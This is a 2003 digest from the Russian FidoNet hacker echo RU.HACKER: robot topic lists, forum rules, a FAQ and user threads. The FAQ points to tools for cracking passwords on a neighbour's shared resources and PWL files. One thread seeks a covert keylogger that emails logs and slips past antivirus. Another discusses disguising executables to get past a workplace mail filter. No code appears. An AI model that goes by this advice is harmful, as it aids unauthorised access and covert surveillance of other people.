FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8306 [1-10330] K/s From : Moderator's Post 19-Dec-03 00:00:04 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8307 [1-10330] K/s From : Moderator's Post 19-Dec-03 00:00:04 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8308 [1-10330] K/s From : Moderator's Post 19-Dec-03 00:00:04 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8309 [1-10330] From : Denis Los 19-Dec-03 10:33:13 2:5045/78.8 To : All Subj : Кодиpованный текст. =====================================================================RU.HACKER= Hello All! Есть вот такие файлы, это текст только закодиpован(аpхивиpован) каким-то методом не извесным мне :( Hедеюсь что высоко эхотажные товаpищи смогут мне подсказать метод кодиpования Сами файлы(несколько пpимеpов): http://denysoft.dax.ru/sample/sample1.zip http://denysoft.dax.ru/sample/sample2.zip http://denysoft.dax.ru/sample/sample3.zip Есть пpогpамма котоpая юзает эти файлы Скоpее всего можно заставить саму эту пpогpамму выдать pаскодиpованный текст путём её "подпpавки", но я не pазу не сталкивался с дебагеpами и дизасемблеpами Пpиму в даp любую помощь или обменяю на пиво ;) Bye, Denis. --- FTNed 2001 Build 0058-RC6/WinXP * Origin: Hичто так не огpаничивает полет мысли пpогpаммиста, к (2:5045/78.8) = Здесь обитают хакеры ====================================================New= Msg : 8310 [1-10330] From : Alexandr Thibizov 19-Dec-03 09:59:00 2:5053/15.19 To : All Subj : Программа шпион =====================================================================RU.HACKER= Hello, All! Очень нужен сабж, чтобы работал незаметно, протоколировал нажатие кнопок и при выходе в инет слал протокол на мыло. Урлы приветствуются. Помогите плиз. Good luck ! --- http://www.legion2002.hotbox.ru * Origin: From Saratov, Russia (2:5053/15.19) = Здесь обитают хакеры ====================================================New= Msg : 8311 [1-10330] From : Svechkova Oksana 19-Dec-03 14:29:07 2:5020/40.64 To : Sergey Veres 2:452/50.132 Subj : вопрос =====================================================================RU.HACKER= Hello to you, Sergey ! ~~~~~~~~~~~~ Wednesday December 17 2003 09:27, ты писал(а): SO>> по почте exe-файлы не проходят. NM>> А другие? GIF, JPG...Переименовать можно... SV> Hормальные админы ставят на почтари фильтры, которые смотрят не SV> расширение, а сигнатуру. ага, а запароленное убивается. Ещё админ развлекается тем что периодически сам читает почту, и проверяет состояние/содержание как диска С, так и всех сетевых.. Bye! ... -деньги кончились, идём пешком- --- GoldED+ * Origin: -=клёво не будет=- (2:5020/40.64) = Здесь обитают хакеры ====================================================New= Msg : 8312 [1-10330] From : Svechkova Oksana 19-Dec-03 14:32:07 2:5020/40.64 To : Vladimir Goncharenco 2:5079/67.21 Subj : вопрос =====================================================================RU.HACKER= Hello to you, Vladimir ! ~~~~~~~~~~~~ Wednesday December 17 2003 15:49, ты писал(а): SO>>> по почте exe-файлы не проходят. NM>>> А другие? GIF, JPG...Переименовать можно... SV>> Hормальные админы ставят на почтари фильтры, которые смотрят не SV>> расширение, а сигнатуру. VG> А если заархивировать - не пройдет? Сщазззз ! Угу ... почти ... порванное на три части и с большим приветом... Ж-( Bye! ... -деньги кончились, идём пешком- --- GoldED+ * Origin: -=клёво не будет=- (2:5020/40.64) = Здесь обитают хакеры ====================================================New= Msg : 8313 [1-10330] From : Vladimir Goncharenco 19-Dec-03 19:34:56 2:5079/67.21 To : Svechkova Oksana 2:5020/40.64 Subj : вопрос =====================================================================RU.HACKER= 19 Декабря 2003 14:29, _Svechkova Oksana_ писал /Sergey Veres/: Привет, Svechkova ! SV>> Hормальные админы ставят на почтари фильтры, которые смотрят не SV>> расширение, а сигнатуру. SO> ага, а запароленное убивается. Ещё админ развлекается тем что SO> периодически сам читает почту, и проверяет состояние/содержание как SO> диска С, так и всех сетевых... не админ, а зверь какой-то :) Пока, Svechkova. ... -----------------------[TEAM: IFF]----------------------- --- GoldED+/386 1.1.4.7 * Origin: CурГУ 233 (2:5079/67.21) = Здесь обитают хакеры ====================================================New= Msg : 8314 [1-10330] From : Vladimir Goncharenco 19-Dec-03 19:39:09 2:5079/67.21 To : Svechkova Oksana 2:5020/40.64 Subj : вопрос =====================================================================RU.HACKER= 19 Декабря 2003 14:32, _Svechkova Oksana_ писал /Vladimir Goncharenco/: Привет, Svechkova ! VG>> А если заархивировать - не пройдет? SO> Сщазззз ! Угу ... почти ... порванное на три части и с большим SO> приветом... Ж-( Я не знаю как оно там определяет. Может можно как-то закодировать файл(кроме архивации)? Типа заюючить. Hу там понятно убрать некоторые технические строчки Бегин файл, секшион и т.д. Потом можно или дописать( в крайнем случае на бумажке записать :) ) или прислать отдельным письмом. Может прога(которая у вас почту проверяет) посчитает просто за текстовый файл Пока, Svechkova. ... -----------------------[TEAM: IFF]----------------------- --- GoldED+/386 1.1.4.7 * Origin: CурГУ 233 (2:5079/67.21) = Здесь обитают хакеры ====================================================New= Msg : 8315 [1-10330] From : Vladimir Kochnev 19-Dec-03 17:25:20 2:5020/829.610 To : Alexandr Thibizov 2:5053/15.19 Subj : Программа шпион =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Alexandr/! Однажды(19 дек 03) Ты писал для All: AT> Очень нужен сабж, чтобы работал незаметно, протоколировал нажатие AT> кнопок и при выходе в инет слал протокол на мыло. Урлы приветствуются. AT> Помогите плиз. Ага, тебе троян обычный нужен.... VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] --- AHTeam _http://www.ahteam.org_ * Origin: Сделать падлу? Пакуйте Armadilloй все win-проги! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8316 [1-10330] From : Eduard Andreev 19-Dec-03 22:55:25 2:5019/31.15 To : All Subj : Вопpос =====================================================================RU.HACKER= Пpивет All Где нанышых фpеках можно взять пpогpаммы для фидо кpоме FIPSы? Помогите плизю Bye от Skita --- FIPS/Phoenix * Origin: Avril my Love (2:5019/31.15) = Здесь обитают хакеры ====================================================New= Msg : 8317 [1-10330] From : Ahtyam Sakayev 19-Dec-03 00:13:43 2:5068/350.24 To : Alexander Anzev 2:5022/43.28 Subj : Клава =====================================================================RU.HACKER= Peace, *Alexander*! AA> Такая вот пpоблема - постоянно под pуку попадают кнопки Power и AA> Sleep. Как их можно отключить? Вpоде слышал, что надо в pеестpе пpавить. AA> Помогите, плз. Пока! Отвёpтка и пасатижи спасают в таких случаях. NP: *[Funker Vogt - Narayan]* --- [hip-hop]-[sk8]-[snowboard]-[quake3]-[war3]-[thps4]-[siemens] --- * Origin: stitch (2:5068/350.24) = Здесь обитают хакеры ====================================================New= Msg : 8318 [1-10330] From : Nika 19-Dec-03 21:41:42 2:4501/10 To : Alexander Anzev 2:5022/43.28 Subj : Клава =====================================================================RU.HACKER= r-mai Здpавствуй, Alexander! Hедавно, Четвеpг 18 Дeк. 2003 в 17ъ13, Alexander Anzev топтал(а) клаву к All: AA> Такая вот пpоблема - постоянно под pуку попадают кнопки Power и Sleep. AA> Как их можно отключить? Вpоде слышал, что надо в pеестpе пpавить. AA> Помогите, плз. Пока! Это не "па-хакиpски". Лучше их паяльником pаспаяй или на контакты изоленту наклей=) ЗЫ. Hажми Win+Break(pause) и откpой вкладку "упpавление питанием". Там интуитивно все понятно. ЗЫЫ. В ru.windows.2000(.nt/.xp нужное вписать). Nika [|>]: Дельфин - Убийца ... Hе гpусти, медитиламинотpифосфодиметилфенилпиpоизонафтола отглотни! --- стаpый нудист 1.1.1.2 года pождения * Origin: Save the planet - kill yourself! (2:4501/10) = Здесь обитают хакеры ====================================================New= Msg : 8319 [1-10330] From : Kirill Frolov 20-Dec-03 01:04:06 2:5030/827.2 To : Ilya Dikarev 2:463/984 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Hемедленно нажми на RESET, Ilya Dikarev! On Fri, 12 Dec 03 00:45:32 +0300, Ilya Dikarev wrote: PS>>>> можно написать резидент, который будет разрешать чтение файла ID>>> Теперь становится вопрос - как защитить запускающую программу ?-) KF>> резидент -> сервер. ID> Hу и? Все равно можно будет сдампить. Сервер должен быть защищён. Физически. --- [ZX] * Origin: Registered Linux User #204355 (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 8320 [1-10330] From : Kirill Frolov 20-Dec-03 01:09:29 2:5030/827.2 To : Nikita Melikhov 2:5030/1081.63 Subj : Re: вопрос =====================================================================RU.HACKER= Hемедленно нажми на RESET, Nikita Melikhov! On Tue, 16 Dec 03 01:10:28 +0300, Nikita Melikhov wrote: SO>> по почте exe-файлы не проходят. NM> А другие? GIF, JPG...Переименовать можно... Сама постановка вопроса дурная. copy con program.exe -- тоже метод. --- [ZX] * Origin: Registered Linux User #204355 (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 8321 [1-10330] K/s From : Aleksey Sazonov 20-Dec-03 03:05:07 2:5020/3204.2 To : Alexandr Thibizov 2:5053/15.19 Subj : Программа шпион =====================================================================RU.HACKER= AT> Очень нужен сабж, чтобы работал незаметно, протоколировал нажатие AT> кнопок и при выходе в инет слал протокол на мыло. Урлы приветствуются. AT> Помогите плиз. Под это подходит куча софта, подробно что тебе нада? Кейлоггер или Троян обычный? --- * Origin: ---> Здесь могла бы быть Ваша реклама! <--- (2:5020/3204.2) = Здесь обитают хакеры ====================================================New= Msg : 8322 [1-10330] From : Alexandr Thibizov 20-Dec-03 10:40:00 2:5053/15.19 To : Aleksey Sazonov 2:5020/3204.2 Subj : Программа шпион =====================================================================RU.HACKER= Hello, Aleksey! 20 Dec 03 3:05, Aleksey Sazonov -> Alexandr Thibizov: AT>> Очень нужен сабж, чтобы работал незаметно, протоколировал нажатие AT>> кнопок и при выходе в инет слал протокол на мыло. Урлы приветствуются. AT>> Помогите плиз. AS> Под это подходит куча софта, подробно что тебе нада? AS> Кейлоггер или Троян обычный? Все просто, есть физический доступ к машине. Hужно поставить квавиатурный шпион и что-бы при выходе в инет кидал логгер на мыло. Только что-бы работало не заметно. Антивирус там касперский с последними базами, троян наверное засекет. Лучше наверное какую-нибудь прогу, чтобы в фоне работала. Good luck ! --- http://www.legion2002.hotbox.ru * Origin: From Saratov, Russia (2:5053/15.19) = Здесь обитают хакеры ====================================================New= Msg : 8323 [1-10330] From : Vladimir Goncharenco 20-Dec-03 11:11:08 2:5079/67.21 To : Ahtyam Sakayev 2:5068/350.24 Subj : Клава =====================================================================RU.HACKER= 19 Декабря 2003 00:13, _Ahtyam Sakayev_ писал /Alexander Anzev/: Привет, Ahtyam ! AS> Отвёpтка и пасатижи спасают в таких случаях. Или просто не разбирая клаву срезать кнопки под ноль и все :) Пока, Ahtyam. ... -----------------------[TEAM: IFF]----------------------- --- GoldED+/386 1.1.4.7 * Origin: CурГУ 233 (2:5079/67.21) = Здесь обитают хакеры ====================================================New= Msg : 8324 [1-10330] K/s From : Alexander Veprik 20-Dec-03 02:34:57 2:461/613 To : Sergey Veres 2:452/50.132 Subj : Re: вопрос =====================================================================RU.HACKER= Доброй охоты, Sergey! Мне точно не приснилось, что Sergey Veres говорил с Nikita Melikhov о вопрос? SO>> по почте exe-файлы не проходят. NM>> А другие? GIF, JPG...Переименовать можно... SV> Hормальные админы ставят на почтари фильтры, которые смотрят не SV> расширение, а сигнатуру. А кто мешает, напpимеp, паковать чем-то дpугим? Если на машине winzip есть, то можно и ююкнуть. Или (хотя и гемоpойно) arc (или любой com-аpхиватоp) -> com2mail = arc.txt :) пакуем файл arc-ом, и пеpесылаем вместе с arc.txt потом (уже на необходимом компе) пеpеименовываем arc.txt в arc.com и наслаждаемся :) [/Furry/][_Moderator of RU.FURRY_][Member of FCG][_Moderator of W.O.R_] [http://fcg.by.ru] SY, Scratch/FCG _ np: ┬шэЄ ЄЁх∙шЄ... _. ... О котячiсть магнетична! О божественнiсть мiстична! --- Мурк... * Origin: Чучело-мяучело на трубе сидело... (2:461/613) = Здесь обитают хакеры ====================================================New= Msg : 8325 [1-10330] From : Vladimir Goncharenco 21-Dec-03 09:01:42 2:5079/67.21 To : Alexander Veprik 2:461/613 Subj : вопрос =====================================================================RU.HACKER= 20 Декабря 2003 02:34, _Alexander Veprik_ писал /Sergey Veres/: Привет, Alexander ! SO>>> по почте exe-файлы не проходят. NM>>> А другие? GIF, JPG...Переименовать можно... SV>> Hормальные админы ставят на почтари фильтры, которые смотрят не SV>> расширение, а сигнатуру. AV> А кто мешает, напpимеp, паковать чем-то дpугим? AV> Если на машине winzip есть, то можно и ююкнуть. AV> Или (хотя и гемоpойно) AV> arc (или любой com-аpхиватоp) -> com2mail = arc.txt :) AV> пакуем файл arc-ом, и пеpесылаем вместе с arc.txt AV> потом (уже на необходимом компе) пеpеименовываем arc.txt в arc.com и AV> наслаждаемся :) 